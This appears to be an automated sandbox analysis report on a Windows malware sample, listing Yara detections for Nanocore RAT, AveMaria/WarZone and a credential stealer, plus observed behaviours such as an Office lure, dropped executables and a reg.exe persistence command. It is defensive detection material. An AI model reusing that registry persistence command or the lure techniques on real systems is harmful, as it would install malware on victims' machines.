Source: Yara match File source: 11.2.microA.exe.34da100.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2170454925.000000000225C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2169463839.00000000005AC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000003.2235385104.00000000007E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2162762673.00000000037DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2169166646.00000000005A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2232511346.0000000002471000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2171376999.00000000032C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2168345200.0000000002266000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2168254324.0000000001FFB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2232610270.00000000033A9000.00000004.00000001.sdmp, type: MEMORY
Yara detected Nanocore RAT
Source: Yara match File source: 00000024.00000002.2368647593.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2365853715.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2373841874.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00413695 CreateDesktopW,AssocQueryStringW,PathFindFileNameW,CharLowerW,PathFindFileNameW,CharLowerW,SHFileOperationW,CreateDirectoryW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateProcessW,CreateProcessW,SHFileOperationW,CreateDirectoryW,GetPrivateProfileStringW,CreateProcessW,CreateProcessW,WaitForSingleObject,CreateFileW,WriteFile,CloseHandle,CreateProcessW,GetPrivateProfileStringW,CreateFileW,WriteFile,CloseHandle,CreateProcessW,CreateProcessW,CreateProcessW, 16_2_00413695

System Summary:

Malicious sample detected (through community Yara rule)
Source: 25.2.images.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 25.2.images.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 16.2.microA.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.2.microA.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 10.2.microA.exe.3369c78.12.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 17.2.microA.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 17.2.microA.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 18.2.microA.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 18.2.microA.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 11.2.microA.exe.34da100.12.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 11.2.microA.exe.34da100.12.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 12.2.microA.exe.33be930.10.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 12.2.microA.exe.232ff60.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 12.2.microA.exe.232ff60.7.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 25.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 25.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 11.2.microA.exe.34da100.12.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 10.2.microA.exe.2095f04.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000024.00000002.2366916666.00000000007D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000024.00000002.2366832596.00000000007B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000024.00000002.2365853715.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000024.00000002.2365853715.0000000000402000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000019.00000002.2365335764.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: AveMaria_WarZone Author: unknown
Source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000010.00000002.2173889702.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: AveMaria_WarZone Author: unknown
Source: 00000024.00000002.2366678139.0000000000740000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000024.00000002.2366711358.0000000000760000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000024.00000002.2367125830.0000000000C30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000012.00000002.2169991730.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: AveMaria_WarZone Author: unknown
Source: 00000024.00000002.2373841874.00000000034F9000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000024.00000002.2366178722.0000000000580000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000024.00000002.2365752847.00000000003C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000024.00000002.2368726413.0000000002502000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000024.00000002.2374416119.0000000003777000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing when opening.
Source: Screenshot number: 12 Screenshot OCR: Enable Editing when opening.
Found suspicious RTF objects
Source: abdtfhgXgdghgh.ScT Static RTF information: Object: 0 Offset: 00000961h abdtfhgXgdghgh.ScT
Microsoft Office creates scripting files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\microA[1].exe
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\microA.exe
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\AppData\Roaming\microA.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\microA.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\microA.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\microA.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\microA.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\microA.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\microA.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\microA.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\microA.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\microA.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\microA.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\microA.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\ProgramData\images.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\ProgramData\images.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\reg.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\reg.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\images.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\images.exe Memory allocated: 76D20000 page execute and read and write
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0040EDA9 GetCurrentProcess,NtQueryInformationProcess, 16_2_0040EDA9
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_0040EDA9 GetCurrentProcess,NtQueryInformationProcess, 17_2_0040EDA9
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_0040EDA9 GetCurrentProcess,NtQueryInformationProcess, 18_2_0040EDA9
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_0040EDA9 GetCurrentProcess,NtQueryInformationProcess, 25_2_0040EDA9
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BFA3D5 UserRegisterWowHandlers,NtVdmControl, 25_2_03BFA3D5
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BC53D2 NtCallbackReturn, 25_2_03BC53D2
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C0E2BA GetCurrentThread,NtOpenThreadToken,NtQueryInformationToken,CloseHandle,GetCurrentProcessId,ProcessIdToSessionId,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,NtRaiseHardError, 25_2_03C0E2BA
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C011B0 RecordShutdownReason,NtOpenThreadToken,NtOpenThreadToken,NtOpenThreadToken,NtOpenProcessToken,NtClose,NtClose,RtlAllocateHeap,CsrAllocateCaptureBuffer,RtlAllocateHeap,CsrAllocateMessagePointer,CsrAllocateMessagePointer,CsrAllocateMessagePointer,CsrAllocateMessagePointer,CsrAllocateMessagePointer,CsrClientCallServer,CsrFreeCaptureBuffer,RtlFreeHeap,RtlFreeHeap, 25_2_03C011B0
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BF912F WaitForInputIdle,NtQueryInformationProcess, 25_2_03BF912F
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BDE124 MultiByteToWideChar,NtCallbackReturn, 25_2_03BDE124
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BB810B NtCallbackReturn, 25_2_03BB810B
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BFB107 RtlOpenCurrentUser,RtlInitUnicodeString,RtlInitUnicodeString,NtOpenKey,NtOpenKey,RtlInitUnicodeString,NtQueryValueKey,NtClose,NtClose,NtClose,RtlInitUnicodeString,NtOpenKey,NtClose,NtClose,RtlInitUnicodeString,NtQueryValueKey,wcstoul,RtlInitUnicodeString,NtCreateKey,RtlInitUnicodeString,NtSetValueKey,NtClose,RtlInitUnicodeString,NtDeleteValueKey,NtClose, 25_2_03BFB107
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BC20B0 NtCallbackReturn, 25_2_03BC20B0
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C010BF CreateThread,GetExitCodeThread,NtClose, 25_2_03C010BF
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BDE019 RtlFreeHeap,NtCallbackReturn,RtlAllocateHeap,RtlAllocateHeap,memcpy,RtlAllocateHeap,RtlAllocateHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap, 25_2_03BDE019
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BC7044 PeekMessageA,NtYieldExecution, 25_2_03BC7044
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BDB7F5 NtCallbackReturn, 25_2_03BDB7F5
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BF47EB NtClose,RtlInitUnicodeString,NtQueryValueKey, 25_2_03BF47EB
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BCA7DE NtCallbackReturn, 25_2_03BCA7DE
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BC9719 NtCallbackReturn, 25_2_03BC9719
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BC36BC NtCallbackReturn, 25_2_03BC36BC
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BBB6FA FreeLibrary,FreeLibrary,RtlDeleteCriticalSection,RtlDeleteCriticalSection,RtlDeleteCriticalSection,RtlDeleteCriticalSection,RtlDeleteCriticalSection,RtlDeleteCriticalSection,RtlDeleteCriticalSection,RtlDeleteCriticalSection,RtlDeleteCriticalSection,EntryPoint,DisableThreadLibraryCalls,RtlInitializeCriticalSection,RtlInitializeCriticalSection,RtlInitializeCriticalSection,RtlInitializeCriticalSection,RtlInitializeCriticalSection,RtlInitializeCriticalSection,RtlInitializeCriticalSection,RtlInitializeCriticalSection,RtlInitializeCriticalSection,NtQuerySystemInformation,GetModuleHandleW,FindResourceExA,FindResourceExW,LoadStringBaseExW,LoadResource,SizeofResource,RegisterWaitForInputIdle,GdiDllInitialize,QueryActCtxSettingsW,FreeLibrary, 25_2_03BBB6FA
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BBA6E0 NtCallbackReturn, 25_2_03BBA6E0
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BDE66F NtCallbackReturn, 25_2_03BDE66F
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BFA666 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlInitUnicodeString,RtlUnicodeStringToInteger,LoadLibraryW,FreeLibrary,GetProcAddress,NtClose,LoadLibraryW,GetProcAddress,GetModuleFileNameW,FreeLibrary,CreateFileW, 25_2_03BFA666
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BC55AA NtCallbackReturn, 25_2_03BC55AA
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BF95FC NtClose, 25_2_03BF95FC
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BB85E8 NtCallbackReturn, 25_2_03BB85E8
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BC05D2 PeekMessageW,NtYieldExecution, 25_2_03BC05D2
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C1A540 NtQuerySystemInformation, 25_2_03C1A540
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BDE53B NtCallbackReturn, 25_2_03BDE53B
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C00551 NtQueryInformationProcess, 25_2_03C00551
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BF9503 SetUserObjectSecurity,NtSetSecurityObject, 25_2_03BF9503
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BC04B6 NtOpenDirectoryObject,NtClose,RtlInitUnicodeString, 25_2_03BC04B6
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C174E6 _wcsicmp,wcsncpy_s,wcsncpy_s,memset,CreateProcessW,NtClose,NtClose,NtClose, 25_2_03C174E6
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BC548F NtCallbackReturn, 25_2_03BC548F
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BF94CD GetUserObjectSecurity,NtQuerySecurityObject, 25_2_03BF94CD
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C15472 _UserTestTokenForInteractive,NtQueryInformationToken,NtQueryInformationToken,RtlAllocateHeap,NtQueryInformationToken,RtlFreeHeap, 25_2_03C15472
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BFB455 wcstoul,GetPrivateProfileStringW,WritePrivateProfileStringW,wcstoul,RtlInitUnicodeString,RtlInitUnicodeString,NtOpenKey,NtOpenKey,RtlInitUnicodeString,NtQueryValueKey,NtQueryValueKey,RtlInitUnicodeString,NtQueryValueKey,RtlInitUnicodeString,NtQueryValueKey,wcstol,RtlInitUnicodeString,NtOpenKey,RtlInitUnicodeString,NtQueryValueKey,NtClose, 25_2_03BFB455
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BFABCC RtlInitUnicodeString,NtClose,RtlInitUnicodeString,NtOpenKey,NtEnumerateKey,RtlUnicodeStringToInteger,RtlInitUnicodeString,NtOpenKey,RtlInitUnicodeString,NtQueryValueKey,NtClose,lstrcmpiW,NtEnumerateKey,NtClose, 25_2_03BFABCC
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BB8B52 NtCallbackReturn, 25_2_03BB8B52
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BB8AAB NtCallbackReturn, 25_2_03BB8AAB
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BC7AD0 RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,NtOpenKey,NtQueryValueKey,NtClose,RtlNtStatusToDosError,SetLastError, 25_2_03BC7AD0
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BDBA23 NtCallbackReturn, 25_2_03BDBA23
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BBAA6C memset,LoadLibraryExW,WideCharToMultiByte,GetProcAddress,FreeLibrary,NtCallbackReturn, 25_2_03BBAA6C
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BC2A4C NtCallbackReturn, 25_2_03BC2A4C
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BCE9BC NtCallbackReturn, 25_2_03BCE9BC
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C009C4 GetCurrentThread,NtOpenThreadToken,GetCurrentProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,RtlAllocateHeap,NtQueryInformationToken,RtlFreeHeap,NtClose, 25_2_03C009C4
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BB99F4 NtCallbackReturn,RtlReleaseActivationContext, 25_2_03BB99F4
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C01533 ExitWindowsEx,SetLastError, 25_2_03C01533
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\images.exe File created: C:\Windows\System32\rfxvmt.dll
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_00402008 10_2_00402008
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_00400DA7 10_2_00400DA7
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_004020BA 10_2_004020BA
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_00401621 10_2_00401621
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_00400F1B 10_2_00400F1B
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_0040171C 10_2_0040171C
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_004047C8 10_2_004047C8
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_004047D8 10_2_004047D8
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_01E21A1A 10_2_01E21A1A
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_01E27B88 10_2_01E27B88
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_01E27B77 10_2_01E27B77
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_01E27B41 10_2_01E27B41
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_01E21A7D 10_2_01E21A7D
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 10_2_04E6417C 10_2_04E6417C
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_00232008 11_2_00232008
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_00230DBB 11_2_00230DBB
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_002320BA 11_2_002320BA
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_00231621 11_2_00231621
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_00230F1B 11_2_00230F1B
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_0023171C 11_2_0023171C
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_002347C8 11_2_002347C8
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_002347D8 11_2_002347D8
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_00501A1A 11_2_00501A1A
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_00501A7D 11_2_00501A7D
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_00507B77 11_2_00507B77
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_00507B88 11_2_00507B88
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 11_2_01FE417C 11_2_01FE417C
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_00262008 12_2_00262008
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_00260DBB 12_2_00260DBB
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_00262329 12_2_00262329
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_002620BA 12_2_002620BA
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_00261621 12_2_00261621
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_0026171C 12_2_0026171C
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_00260F1B 12_2_00260F1B
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_002647C8 12_2_002647C8
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_002647D8 12_2_002647D8
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_00621A1A 12_2_00621A1A
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_00621A7D 12_2_00621A7D
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_00627B77 12_2_00627B77
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_00627B88 12_2_00627B88
Source: C:\Users\user\AppData\Roaming\microA.exe Code function: 12_2_045B4197 12_2_045B4197
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_00413279 16_2_00413279
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 16_2_0041DEAA 16_2_0041DEAA
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_00413279 17_2_00413279
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 17_2_0041DEAA 17_2_0041DEAA
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_00413279 18_2_00413279
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: 18_2_0041DEAA 18_2_0041DEAA
Source: C:\ProgramData\images.exe Code function: 20_2_002D2008 20_2_002D2008
Source: C:\ProgramData\images.exe Code function: 20_2_002D0DBB 20_2_002D0DBB
Source: C:\ProgramData\images.exe Code function: 20_2_002D20BA 20_2_002D20BA
Source: C:\ProgramData\images.exe Code function: 20_2_002D1621 20_2_002D1621
Source: C:\ProgramData\images.exe Code function: 20_2_002D171C 20_2_002D171C
Source: C:\ProgramData\images.exe Code function: 20_2_002D0F1B 20_2_002D0F1B
Source: C:\ProgramData\images.exe Code function: 20_2_002D47C8 20_2_002D47C8
Source: C:\ProgramData\images.exe Code function: 20_2_002D47D8 20_2_002D47D8
Source: C:\ProgramData\images.exe Code function: 20_2_004D1A1A 20_2_004D1A1A
Source: C:\ProgramData\images.exe Code function: 20_2_004D1A7D 20_2_004D1A7D
Source: C:\ProgramData\images.exe Code function: 20_2_004D7B77 20_2_004D7B77
Source: C:\ProgramData\images.exe Code function: 20_2_004D7B88 20_2_004D7B88
Source: C:\ProgramData\images.exe Code function: 20_2_008B417C 20_2_008B417C
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_00413279 25_2_00413279
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_0041DEAA 25_2_0041DEAA
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BF72CE 25_2_03BF72CE
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BD9236 25_2_03BD9236
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BD0219 25_2_03BD0219
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BDD200 25_2_03BDD200
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BC914C 25_2_03BC914C
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BCF6BA 25_2_03BCF6BA
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BD3643 25_2_03BD3643
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03C0A5A4 25_2_03C0A5A4
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BD89A9 25_2_03BD89A9
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: 25_2_03BB69ED 25_2_03BB69ED
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: String function: 004036F7 appears 216 times
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: String function: 0040357C appears 93 times
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: String function: 004034D1 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: String function: 00411E88 appears 147 times
Source: C:\Users\user\AppData\Local\Temp\microA.exe Code function: String function: 0040BC0D appears 42 times
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: String function: 004036F7 appears 72 times
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: String function: 03BB6125 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: String function: 0040357C appears 31 times
Source: C:\Users\user\AppData\Local\Temp\images.exe Code function: String function: 00411E88 appears 49 times
PE file contains strange resources
Source: microA[1].exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: microA.exe.3.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: microA.exe.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: microA.exe.11.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: microA.exe.12.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: images.exe.16.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Spawns drivers
Source: unknown Driver loaded: C:\Windows\System32\drivers\rdpdr.sys
Uses reg.exe to modify the Windows registry
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
Yara signature match
Source: 25.2.images.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 25.2.images.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
